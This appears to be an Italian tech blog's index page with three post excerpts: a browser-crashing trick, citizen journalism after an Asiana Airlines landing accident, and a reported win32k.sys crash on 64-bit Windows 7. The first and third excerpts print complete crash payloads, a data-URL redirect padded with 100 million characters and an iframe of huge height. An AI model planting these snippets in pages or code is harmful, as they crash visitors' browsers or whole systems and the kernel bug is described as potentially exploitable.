Ammazzabrowser

<!DOCTYPE html>
<html>
 <head>
 <script>
 location = 'data:text/html,<script>location = "location.toString + \"A\"";' + 'A'.repeat( 100000000 );
 </script>
 </head>
</html>

Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso.

Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com. Leggi tutto “Ammazzabrowser”

Citizen journalism

Esiste anche una traduzione italiana del termine, ma non mi piace.

Poco fa un Boeing 777 della Asiana Airlines ha avuto un incidente durante l’atterraggio all’aeroporto internazionale di San Francisco.

Mentre iniziavano i lanci delle breaking news su You Tube apparivano i primi filmati e un passeggero scampato all’incidente twittava una foto:

sfotwit1

Nove minuti più tardi David Eun aggiungeva un commento con un ovvio (per un americano) termine di paragone:

sfotwit2

 

Leggi tutto “Citizen journalism”

Vulnerabilità in win32k.sys di Win7/64

<iframe height='18082563'></iframe>

w3bd3vil ha scoperto che questo frammento HTML visualizzato con Safari in un Windows 7 a 64 bit riesce a generare un errore di win32k.sys e a mandare il sistema in crash.

Il problema non è, ovviamente, di Safari perché un’applicazione utente non deve riuscire a mandare in crash un driver del kernel.

Il problema sembra essere un baco di win32k.sys causato da una scrittura di dati in un’area di memoria non prevista (memory corruption). Questo tipo di vulnerabilità può essere utilizzata (come è già stato fatto in passato) per bypassare il sistema di sicurezza di Windows e installare programmi senza il consenso dell’utente.

È legittimo pensare che, ora che questo baco è stato scoperto, ci saranno altri tentativi di sfruttarlo, finché Microsoft non lo correggerà. (via ISC)